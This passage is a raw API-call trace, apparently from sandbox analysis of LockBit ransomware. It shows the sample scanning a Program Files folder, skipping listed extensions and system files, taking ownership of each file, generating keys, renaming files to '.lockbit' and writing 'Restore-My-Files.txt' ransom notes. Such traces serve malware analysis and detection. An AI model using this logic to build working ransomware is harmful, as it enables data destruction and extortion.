lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.335] malloc (_Size=0xca) returned 0x77d800 [0085.335] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xca, FileInformationClass=0xa) returned 0x0 [0085.336] free (_Block=0x77d800) [0085.336] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.336] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.336] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.336] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3626c1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3626c1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.336] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.336] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.336] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0085.336] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.336] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.336] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.336] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.336] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.336] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.337] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.337] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.337] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.337] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.337] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.337] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.337] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.338] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.338] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.338] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.338] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.338] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.451] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.451] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.451] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.451] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.451] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.451] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.451] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.451] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.451] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.451] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0085.451] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0085.451] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.451] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0085.451] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.451] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.451] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.452] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.452] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.452] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.452] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.452] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.452] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.453] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.453] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.453] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 96 [0085.453] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.453] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.454] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.454] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.454] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.454] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.454] RtlFreeAnsiString (AnsiString="\\") [0085.454] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.454] malloc (_Size=0x200) returned 0x77d800 [0085.454] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.455] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.455] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.455] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.455] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.456] CloseHandle (hObject=0x3b8) returned 1 [0085.456] free (_Block=0x77d800) [0085.456] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.456] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.456] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.456] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0085.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.457] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.459] malloc (_Size=0xd6) returned 0x1ff1e60 [0085.460] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd6, FileInformationClass=0xa) returned 0x0 [0085.460] free (_Block=0x1ff1e60) [0085.460] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.460] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.460] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.460] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.460] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.460] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.460] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0085.461] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.461] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.461] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.461] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.461] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.462] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.462] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.463] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.463] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.463] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.463] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.463] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.463] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.463] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.463] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png") returned=".png" [0085.463] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.463] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.463] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.463] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.464] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.464] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.464] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.464] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.464] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.464] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.465] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.465] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.465] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png.lockbit") returned 91 [0085.465] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.465] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.466] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.466] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.466] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.466] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.466] RtlFreeAnsiString (AnsiString="\\") [0085.466] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0085.466] malloc (_Size=0x200) returned 0x77d800 [0085.466] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.467] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.467] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.467] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.467] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.467] CloseHandle (hObject=0x3b4) returned 1 [0085.468] free (_Block=0x77d800) [0085.468] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0085.468] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.468] malloc (_Size=0x40068) returned 0x3d70048 [0085.468] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5025) returned 1 [0085.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0085.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0085.469] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.474] malloc (_Size=0xcc) returned 0x1ff1e60 [0085.474] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0085.474] free (_Block=0x1ff1e60) [0085.474] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.474] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.474] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd 